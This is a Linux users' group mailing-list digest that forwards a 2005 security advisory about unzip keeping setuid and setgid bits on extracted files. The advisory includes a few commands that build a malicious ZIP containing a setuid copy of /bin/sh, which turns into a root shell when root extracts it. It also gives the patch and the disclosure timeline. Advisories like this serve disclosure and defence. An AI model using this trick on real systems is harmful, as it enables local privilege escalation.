[Please upgrade unzip/zip on all platforms -- Raju] This is an RFC 1153 digest. (1 message) ----------------------------------------------------------------------
Message-Id: <[EMAIL PROTECTED]> From: Albert Puigsech Galicia <[EMAIL PROTECTED]> To: bugtraq@securityfocus.com Subject: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Date: Mon, 28 Feb 2005 13:17:02 +0000 - ------------------------------------------------------------------ 7a69ezine Advisories 7a69Adv#22 - ------------------------------------------------------------------ http://www.7a69ezine.org [26/01/2005] - ------------------------------------------------------------------ Title: Unzip keep setuid and setgid files Author: Albert Puigsech Galicia - <[EMAIL PROTECTED]> Software: Unzip Versions: >= 5.51 Remote: No Exploit: yes Severity: Low/Medium - ------------------------------------------------------------------ I. Introduction. UnZip is an extraction utility for archives compressed in .zip format. It's compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary objectives have been portability and non-MSDOS fuctionality. More info about unzip on http://www.info-zip.org/pub/infozip/UnZip.html. II. Description. The unzip UNIX functionality allow you to maintain file permisions into compressed files, and of course that includes the setuid bit. Because it does not show a warning message before unpacking a setuid file is posible to create a malicious ZIP file that creates an executable setuid. III. Exploit It's realy easy to test this vulnerability. You can create a malicious ZIP file following this example: $ cp /bin/sh . $ chmod 4777 sh $ zip malicious.zip sh When another user (including root) unpacks the file, a setuid shell file will be created without any warning, as you can see here: # id # unzip malicious.zip Archive: malicious.zip inflating: sh # ls -l sh -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh Of course ye need a local account on the system to execute the file, so it's not a remote vulnerability. IV. Patch Upgrade to unzip 5.52. V. Timeline 12/01/2005 - Bug discovered 16/01/2005 - Vendor contacted 21/01/2005 - Vendor response 25/01/2005 - Vendor patch provided 28/02/2005 - New versión published 28/02/2005 - Advisor published VI. Extra data You can find more 7a69ezine advisories on this following link: http://www.7a69ezine.org/avisos/propios [spanish info] ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves _______________________________________________ ilugd mailinglist -- ilugd@lists.linux-delhi.org http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/ilugd@lists.linux-delhi.org/